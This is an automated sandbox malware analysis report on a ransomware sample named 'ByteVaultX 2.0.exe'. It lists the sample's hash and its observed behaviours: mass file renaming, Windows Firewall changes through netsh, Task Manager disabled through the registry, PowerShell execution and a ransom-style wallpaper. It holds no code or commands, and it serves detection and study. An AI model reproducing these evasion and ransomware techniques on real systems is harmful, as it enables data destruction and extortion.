Malware Analysis Report

2025-06-15 20:56

Sample ID 240525-3cacaaeh66
Target ByteVaultX 2.0.exe
SHA256 d1314cc2b3ddd84224b7b6fe78c9ca75dceed34799b6715086eeacd687e84017
Tags
evasion execution ransomware pyinstaller
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d1314cc2b3ddd84224b7b6fe78c9ca75dceed34799b6715086eeacd687e84017

Threat Level: Known bad

The file ByteVaultX 2.0.exe was found to be: Known bad.

Malicious Activity Summary

evasion execution ransomware pyinstaller

Renames multiple (143) files with added filename extension

Renames multiple (156) files with added filename extension

Renames multiple (184) files with added filename extension

Modifies Windows Firewall

Blocklisted process makes network request

Disables Task Manager via registry modification

Loads dropped DLL

Checks computer location settings

Drops desktop.ini file(s)

Command and Scripting Interpreter: PowerShell

Sets desktop wallpaper using registry

Drops file in Windows directory

Detects Pyinstaller

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-25 23:21

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 23:21

Reported

2024-05-25 23:39

Platform

win10-20240404-en

Max time kernel

1049s

Max time network

1051s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (156) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\1568373884.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fd43fe59faaeda01 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
